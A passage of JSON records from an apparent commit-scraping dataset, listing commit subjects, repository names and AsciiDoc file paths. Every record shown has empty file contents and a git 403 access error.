2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24b4093cf4d571b6a23eb31baa80e30075b32e11","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d09a2526fdd0924b192c53cd09fcb0a56320707","subject":"y2b create post Will This Be Your First Robot?","message":"y2b create post Will This Be Your First Robot?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-21-Will-This-Be-Your-First-Robot.adoc","new_file":"_posts\/2016-10-21-Will-This-Be-Your-First-Robot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6436339667576dfc651556771a3e47fa81e4efe5","subject":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","message":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6c89c382b2447f4de50340f2ffa5968bae99361","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4b41f9c2a3b8294fe1042eeacf6fea03c7ac8c","subject":"CAMEL-10559: maven plugin to validate using the route parser. Donated from fabric8 project.","message":"CAMEL-10559: maven plugin to validate using the route parser. Donated from fabric8 project.\n","repos":"curso007\/camel,Thopap\/camel,adessaigne\/camel,lburgazzoli\/camel,gilfernandes\/camel,yuruki\/camel,tdiesler\/camel,apache\/camel,objectiser\/camel,drsquidop\/camel,akhettar\/camel,tdiesler\/camel,sverkera\/camel,jamesnetherton\/camel,chirino\/camel,anton-k11\/camel,cunningt\/camel,sverkera\/camel,christophd\/camel,gautric\/camel,hqstevenson\/camel,mcollovati\/camel,sabre1041\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,snurmine\/camel,tadayosi\/camel,snurmine\/camel,sabre1041\/camel,veithen\/camel,gilfernandes\/camel,nboukhed\/camel,mgyongyosi\/camel,CodeSmell\/camel,lburgazzoli\/camel,christophd\/camel,davidkarlsen\/camel,tlehoux\/camel,zregvart\/camel,lburgazzoli\/camel,apache\/camel,w4tson\/camel,gilfernandes\/camel,RohanHart\/camel,jamesnetherton\/camel,davidkarlsen\/camel,Fabryprog\/camel,NickCis\/camel,pax95\/camel,CodeSmell\/camel,pmoerenhout\/camel,RohanHart\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,objectiser\/camel,anton-k11\/camel,tadayosi\/camel,Fabryprog\/camel,jkorab\/camel,pkletsko\/camel,nboukhed\/camel,punkhorn\/camel-upstream,kevinearls\/camel,jkorab\/camel,rmarting\/camel,ullgren\/camel,gautric\/camel,rmarting\/camel,veithen\/camel,sverkera\/camel,prashant2402\/camel,DariusX\/camel,apache\/camel,rmarting\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,gautric\/camel,lburgazzoli\/apache-camel,yuruki\/camel,hqstevenson\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,hqstevenson\/camel,ssharma\/camel,RohanHart\/camel,kevinearls\/camel,NickCis\/camel,sverkera\/camel,hqstevenson\/camel,veithen\/camel,cunningt\/camel,mcollovati\/camel,prashant2402\/camel,punkhorn\/camel-upstream,gnodet\/camel,christophd\/camel,chirino\/camel,nicolaferraro\/camel,isavin\/camel,ullgren\/camel,isavin\/camel,hqstevenson\/camel,pkletsko\/camel,pkletsko\/camel,prashant2402\/camel,scranton\/camel,mgyongyosi\/camel,w4tson\/camel,lburgazzoli\/apache-camel,kevinearls\/camel,nboukhed\/camel,cunningt\/camel,mcollovati\/camel,jonmcewen\/camel,zregvart\/camel,adessaigne\/camel,chirino\/camel,nboukhed\/camel,driseley\/camel,tlehoux\/camel,allancth\/camel,jonmcewen\/camel,tlehoux\/camel,curso007\/camel,scranton\/camel,pmoerenhout\/camel,gnodet\/camel,gnodet\/camel,chirino\/camel,yuruki\/camel,apache\/camel,driseley\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel,NickCis\/camel,objectiser\/camel,rmarting\/camel,akhettar\/camel,driseley\/camel,davidkarlsen\/camel,akhettar\/camel,davidkarlsen\/camel,pkletsko\/camel,tlehoux\/camel,anton-k11\/camel,onders86\/camel,tdiesle
r\/camel,sverkera\/camel,jamesnetherton\/camel,mgyongyosi\/camel,sverkera\/camel,snurmine\/camel,akhettar\/camel,allancth\/camel,kevinearls\/camel,tlehoux\/camel,christophd\/camel,drsquidop\/camel,nboukhed\/camel,ullgren\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,tadayosi\/camel,nikhilvibhav\/camel,driseley\/camel,gautric\/camel,CodeSmell\/camel,chirino\/camel,scranton\/camel,adessaigne\/camel,salikjan\/camel,lburgazzoli\/apache-camel,snurmine\/camel,veithen\/camel,rmarting\/camel,acartapanis\/camel,yuruki\/camel,tdiesler\/camel,lburgazzoli\/camel,prashant2402\/camel,sabre1041\/camel,ssharma\/camel,RohanHart\/camel,dmvolod\/camel,gilfernandes\/camel,onders86\/camel,NickCis\/camel,pax95\/camel,anoordover\/camel,alvinkwekel\/camel,jonmcewen\/camel,adessaigne\/camel,ssharma\/camel,drsquidop\/camel,lburgazzoli\/camel,scranton\/camel,driseley\/camel,apache\/camel,dmvolod\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,allancth\/camel,drsquidop\/camel,Thopap\/camel,allancth\/camel,acartapanis\/camel,kevinearls\/camel,CodeSmell\/camel,anton-k11\/camel,anoordover\/camel,dmvolod\/camel,alvinkwekel\/camel,w4tson\/camel,curso007\/camel,Thopap\/camel,apache\/camel,acartapanis\/camel,DariusX\/camel,jkorab\/camel,akhettar\/camel,RohanHart\/camel,drsquidop\/camel,zregvart\/camel,cunningt\/camel,christophd\/camel,drsquidop\/camel,isavin\/camel,mgyongyosi\/camel,jkorab\/camel,sabre1041\/camel,mcollovati\/camel,lburgazzoli\/camel,christophd\/camel,isavin\/camel,jonmcewen\/camel,anoordover\/camel,Thopap\/camel,gilfernandes\/camel,ullgren\/camel,Thopap\/camel,nikhilvibhav\/camel,pkletsko\/camel,anton-k11\/camel,nicolaferraro\/camel,pax95\/camel,tlehoux\/camel,nboukhed\/camel,kevinearls\/camel,onders86\/camel,acartapanis\/camel,scranton\/camel,Fabryprog\/camel,yuruki\/camel,DariusX\/camel,cunningt\/camel,objectiser\/camel,anoordover\/camel,prashant2402\/camel,anoordover\/camel,veithen\/camel,pax95\/camel,gnodet\/camel,NickCis\/camel,gautric\/camel,veithen\/camel,jkorab\/camel,alvinkwekel\/camel,NickCis\/camel,salikjan\/camel,punkhorn\/camel-upstream,sabre1041\/camel,nicolaferraro\/camel,tdiesler\/camel,RohanHart\/camel,pmoerenhout\/camel,pax95\/camel,Thopap\/camel,jamesnetherton\/camel,allancth\/camel,ssharma\/camel,gilfernandes\/camel,gautric\/camel,DariusX\/camel,dmvolod\/camel,tadayosi\/camel,pmoerenhout\/camel,jkorab\/camel,gnodet\/camel,curso007\/camel,zregvart\/camel,snurmine\/camel,pkletsko\/camel,onders86\/camel,anoordover\/camel,w4tson\/camel,Fabryprog\/camel,w4tson\/camel,w4tson\/camel,pmoerenhout\/camel,curso007\/camel,prashant2402\/camel,nikhilvibhav\/camel,jonmcewen\/camel,jonmcewen\/camel,curso007\/camel,dmvolod\/camel,chirino\/camel,punkhorn\/camel-upstream,sabre1041\/camel,mgyongyosi\/camel,dmvolod\/camel,jamesnetherton\/camel,pax95\/camel,hqstevenson\/camel,scranton\/camel,cunningt\/camel,allancth\/camel,isavin\/camel,rmarting\/camel,akhettar\/camel,isavin\/camel,driseley\/camel,acartapanis\/camel,onders86\/camel,tdiesler\/camel,yuruki\/camel,ssharma\/camel,ssharma\/camel","old_file":"tooling\/maven\/camel-maven-plugin\/src\/main\/docs\/camel-maven-plugin.adoc","new_file":"tooling\/maven\/camel-maven-plugin\/src\/main\/docs\/camel-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a97784a9bb4b4e6eeabea12ac39e666fadce543c","subject":"End of year doc (2021)","message":"End 
of year doc (2021)\n\n#5792\n","repos":"khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,davidwatkins73\/waltz-dev","old_file":"docs\/plans\/2021-year-end.adoc","new_file":"docs\/plans\/2021-year-end.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c480a58607ad3b13c45ba0db031f3aa298bba2e0","subject":"release notes: add prior notes for 1.9.0","message":"release notes: add prior notes for 1.9.0\n\nChange-Id: Ib3acd021ae7e777c6f8cd6384247aea941b5c293\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12737\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fab38acacac1620f6b4666e1d2dda10de97f70d2","subject":"y2b create post It Has Double The Battery of iPhone X","message":"y2b create post It Has Double The Battery of iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-28-ItHasDoubleTheBatteryofiPhoneX.adoc","new_file":"_posts\/2018-01-28-ItHasDoubleTheBatteryofiPhoneX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb8fa041c7fa5292c947e351e9ea176d592447df","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a28d4426a813bb945db9d270863be51706bb5c7","subject":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e424735d30097976f36971ad814c360e395e7c4","subject":"Update 
2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea2f0f7e964e349799eeee388dc22d957c59267a","subject":"Update 2016-02-05-These-parks-are-made-for-walking.adoc","message":"Update 2016-02-05-These-parks-are-made-for-walking.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-These-parks-are-made-for-walking.adoc","new_file":"_posts\/2016-02-05-These-parks-are-made-for-walking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63c887ba240d9811cd09d1dbf231f5612356d5f3","subject":"y2b create post Does It Suck? - $15 Bluetooth Beanie","message":"y2b create post Does It Suck? - $15 Bluetooth Beanie","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-26-Does-It-Suck--15-Bluetooth-Beanie.adoc","new_file":"_posts\/2016-02-26-Does-It-Suck--15-Bluetooth-Beanie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d80cb80d7c8924ef3709dcaaefa76096ae7fe133","subject":"y2b create post The Best Sounding Smartphone Ever?","message":"y2b create post The Best Sounding Smartphone Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-27-The-Best-Sounding-Smartphone-Ever.adoc","new_file":"_posts\/2016-07-27-The-Best-Sounding-Smartphone-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cf66687a775b0963d9f00addfb90e1581fc66e6","subject":"Resize image test","message":"Resize image test\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1754b9b316c7f2b906441aa9546a84b114650ac","subject":"Removed 'documentation' badge","message":"Removed 'documentation' badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e4c617bb3f1d7af9e284b053ac9b2087938492","subject":"Update 2016-09-16-Byteman-now-available-in-homebrew.adoc","message":"Update 2016-09-16-Byteman-now-available-in-homebrew.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-09-16-Byteman-now-available-in-homebrew.adoc","new_file":"_posts\/2016-09-16-Byteman-now-available-in-homebrew.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26cb6bc442da6782e1e13e6bd392e8a442e8dd26","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89810a761f3d03b0480883a3084b668cdcc7476","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f4c0636f350a92bb567f057fc56d9a54dc47f9","subject":"y2b create post Switching To The iPhone 7 Plus...","message":"y2b create post Switching To The iPhone 7 Plus...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-20-Switching-To-The-iPhone-7-Plus.adoc","new_file":"_posts\/2016-09-20-Switching-To-The-iPhone-7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52c0067d5abee2a56a98144a12bcaec13fdad4d2","subject":"Update 2017-05-25-Make-your-old-game-Great-Again.adoc","message":"Update 2017-05-25-Make-your-old-game-Great-Again.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-05-25-Make-your-old-game-Great-Again.adoc","new_file":"_posts\/2017-05-25-Make-your-old-game-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ce90145ebd403e1f8ba4776b2d3ac93dd5dd24","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 
2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ba175b8e464a8606cebcae6f9ed96b9b71531a","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3213c33a8ff9311f05b57f04f7bbfbae10da21dc","subject":"Updated credits","message":"Updated credits\n","repos":"aucampia\/dnspod-int-py","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aucampia\/dnspod-int-py.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e85871cfe9d46ef31061396392a3530635ab1711","subject":"Update cross-cluster-search.asciidoc","message":"Update cross-cluster-search.asciidoc\n\nIncreased the required min version of CCS in the docs to 5.5\n","repos":"markwalkom\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,mohit\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearc
h,s1monw\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch","old_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9c5a3111c90de376e6079a3549f51f4f054335d","subject":"Update 2016-10-18-Hello.adoc","message":"Update 2016-10-18-Hello.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2016-10-18-Hello.adoc","new_file":"_posts\/2016-10-18-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea591afc225595e8fc71c4c28bf60595c405f36a","subject":"Update 2018-10-21-O-P-P.adoc","message":"Update 
2018-10-21-O-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-O-P-P.adoc","new_file":"_posts\/2018-10-21-O-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c221fc3799e2477ba243a8e6f5384043a8c50187","subject":"y2b create post Enable Desktop Web Browsing For Android Honeycomb","message":"y2b create post Enable Desktop Web Browsing For Android Honeycomb","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-07-Enable-Desktop-Web-Browsing-For-Android-Honeycomb.adoc","new_file":"_posts\/2011-07-07-Enable-Desktop-Web-Browsing-For-Android-Honeycomb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd2eb4a7119c5ec58633d922afe16060d1053e7c","subject":"Update 